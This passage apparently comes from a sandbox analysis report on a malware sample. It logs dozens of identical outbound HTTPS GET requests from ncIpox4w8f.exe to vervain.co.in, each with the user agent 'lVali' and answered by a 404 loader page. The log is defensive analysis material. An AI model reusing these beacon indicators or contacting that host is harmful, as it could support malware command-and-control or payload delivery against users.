                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:51 UTC19INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                21192.168.2.449776199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:53 UTC20OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:53 UTC20INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:53 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:53 UTC20INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                22192.168.2.449777199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:58 UTC21OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:59 UTC21INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:59 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:59 UTC21INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                23192.168.2.449783199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:00 UTC22OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:01 UTC22INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:01 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:01 UTC22INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                24192.168.2.449789199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:01 UTC23OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:02 UTC23INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:02 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:02 UTC23INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                25192.168.2.449791199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:03 UTC24OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:03 UTC24INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:03 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:03 UTC24INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                26192.168.2.449794199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:04 UTC25OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:04 UTC25INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:04 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:04 UTC25INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                27192.168.2.449795199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:06 UTC26OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:06 UTC26INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:06 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:06 UTC26INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                28192.168.2.449796199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:08 UTC27OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:08 UTC27INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:08 UTC27INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                29192.168.2.449797199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:09 UTC27OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:10 UTC28INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:10 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:10 UTC28INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.449758199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:25 UTC2OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:25 UTC3INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:25 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:25 UTC3INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                30192.168.2.449799199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:10 UTC28OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:11 UTC29INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:11 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:11 UTC29INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                31192.168.2.449800199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:11 UTC29OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:12 UTC30INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:12 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:12 UTC30INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                32192.168.2.449801199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:13 UTC30OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:13 UTC31INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:13 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:13 UTC31INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
